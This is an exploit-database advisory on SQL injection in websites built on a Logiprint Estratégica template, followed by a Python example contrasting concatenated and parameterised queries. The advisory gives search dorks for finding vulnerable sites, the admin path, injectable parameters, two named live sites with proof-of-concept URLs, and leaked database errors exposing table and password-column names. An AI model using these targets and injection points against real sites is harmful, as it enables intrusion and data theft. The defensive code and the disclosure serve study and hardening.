Designed by Logiprint Estratégica Mexico SQL Injection Vulnerability

2018.09.16
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#################################################################################################
# Exploit Title : Designed by Logiprint Estratégica Mexico SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 14/09/2018
# Vendor Homepage : logiprint.com.mx
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork :
intext:''Designed by Logiprint Estratégica''
intext:''Copyright © 2016 Designed by Logiprint Estratégica''
# Admin Login Panel Path => /mi_cuenta/
# Exploit :
/shop-sidebar.php?idcategoria=[SQL Injection]
/shop-product-detail2.php?idproducto=&idcategoria=[SQL Injection]
/shop-product-detail2.php?idproducto=[ID-Number]&idpadre=&idcategoria=[SQL Injection]
/directorio.php?records_per_page=[ID-Number]&p=[ID-Number]&texto_buscar=&primer=[ID-Number]&segundo=[ID-Number]&tercer=[SQL Injection]
#################################################################################################
# Example Sites =>
platoro.com.mx/shop-sidebar.php?idcategoria=8%27 => [ Proof of Concept ] => archive.is/6ZrBZ
galeriajoyera.com.mx/directorio.php?records_per_page=96&p=1&texto_buscar=&primer=5&segundo=2&tercer=24%27 => [ Proof of Concept ] => archive.is/hIMNh
# SQL Database Errors =>
Error: [SELECT idcategorias, idpadre, nombreesp, nombreing, descripcion, imagen, orden, activo FROM logiprint_ultimascate WHERE idcategorias=8' ORDER BY orden ASC]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY orden ASC' at line 1
Error: [SELECT idbanner, imagenesp, imagening, idcategorias, nombre, publicado FROM logiprint_banner WHERE idcategorias = ] You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND activo=1 ORDER BY local ASC' at line 1
Error: [SELECT iddirectorio, nombrecomercial, logo, imgpublica, img1, img2, img3, idpiso, local, idmetal, idcategorias, telefono, telefono1, telefonomovil, paginaweb, emailcontacto, Password, urlf, urlt, urlg, urli, urly, urlp, urlv, describ, activo FROM logiprint_directorio WHERE iddirectorio IN(96,97,161) AND iddirectorio IN(3,6,8,10,16,25,30,33,47,53,55,56,81,88,90,91,92, 95,100,101,104,105,111,112,113,116,117,124,127,130,135,139,140,145,148,150,151,176,177,181,182) AND iddirectorio IN() AND activo=1 ORDER BY local ASC LIMIT 0, 96 ]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND activo=1 ORDER BY local ASC LIMIT 0, 96' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
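The quoted MySQL errors are what a site prints when a request parameter such as idcategoria is spliced straight into the SQL text: a single quote breaks the statement, an empty value leaves `idcategorias = ` with no operand, and an empty list produces `IN()`. The following Python/SQLite model is an added example, not code from the advisory or from the vendor's PHP application. It assumes a constructed table shaped like the `logiprint_ultimascate` table named in the first error (columns trimmed, two sample rows) and shows the concatenation pattern beside a hardened lookup that allow-lists the ID as an integer and binds it as a parameter, plus an IN-list builder that never emits an empty `IN()`.

```python
import re
import sqlite3

# Only plain decimal IDs are accepted; anything else is rejected before it reaches SQL.
ID_PATTERN = re.compile(r"[0-9]{1,10}")


def make_db():
    """Constructed stand-in for the table named in the advisory's first error.

    The real site runs MySQL; an in-memory SQLite table with a trimmed column
    set is enough to show the same splicing failure and the fix."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE logiprint_ultimascate (
            idcategorias INTEGER PRIMARY KEY,
            idpadre      INTEGER,
            nombreesp    TEXT,
            orden        INTEGER,
            activo       INTEGER
        );
        INSERT INTO logiprint_ultimascate VALUES
            (8, 0, 'Anillos',  1, 1),
            (9, 0, 'Collares', 2, 1);
        """
    )
    return db


def vulnerable_lookup(db, idcategoria):
    """The pattern the page's errors imply: the raw request value is pasted into the query.

    Returns ("ok", rows) or ("error", message). A site that echoes the message
    to the page produces exactly the kind of output the advisory quotes."""
    sql = (
        "SELECT idcategorias, idpadre, nombreesp FROM logiprint_ultimascate "
        f"WHERE idcategorias={idcategoria} ORDER BY orden ASC"
    )
    try:
        return "ok", db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "error", str(exc)


def safe_lookup(db, idcategoria):
    """Hardened form: validate the ID against an integer allow-list, then bind it.

    Binding alone already keeps the value out of the SQL grammar; the allow-list
    additionally turns malformed input into a clean rejection instead of a query."""
    if not ID_PATTERN.fullmatch(str(idcategoria)):
        return "rejected", []
    sql = (
        "SELECT idcategorias, idpadre, nombreesp FROM logiprint_ultimascate "
        "WHERE idcategorias=? ORDER BY orden ASC"
    )
    return "ok", db.execute(sql, (int(idcategoria),)).fetchall()


def safe_in_lookup(db, ids):
    """IN-list variant. The page's third error shows `iddirectorio IN()` built from
    an empty list, which MySQL rejects; here an empty or all-invalid list returns
    no rows without touching the database, and each surviving ID gets its own
    placeholder."""
    clean = [int(i) for i in ids if ID_PATTERN.fullmatch(str(i))]
    if not clean:
        return "ok", []
    placeholders = ",".join("?" * len(clean))
    sql = (
        "SELECT idcategorias, nombreesp FROM logiprint_ultimascate "
        f"WHERE idcategorias IN ({placeholders}) AND activo=1 ORDER BY orden ASC"
    )
    return "ok", db.execute(sql, clean).fetchall()


if __name__ == "__main__":
    db = make_db()
    for value in ("8", "8'", "8 OR 1=1"):
        print("vulnerable", repr(value), vulnerable_lookup(db, value))
        print("safe      ", repr(value), safe_lookup(db, value))
    print("in-list      ", safe_in_lookup(db, ["9", "8", "x'"]))
    print("in-list empty", safe_in_lookup(db, []))
```

Running the block prints the three inputs side by side: the concatenating version returns one row for `8`, a syntax error for `8'` (the SQLite counterpart of the MySQL message quoted above), and both rows for a tautology, while the hardened version answers the first and rejects the other two before any SQL is built. The same split applies to the PHP code behind the listed endpoints: a PDO or mysqli prepared statement with bound parameters, preceded by an integer check on each id parameter, removes the whole class of error the advisory documents.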

References:

https://www.cyberizm.org/cyberizm-designed-by-logiprint-estrat%C3%A9gica-mexico-sql-inj-vuln.html


Copyright 2018, cxsecurity.com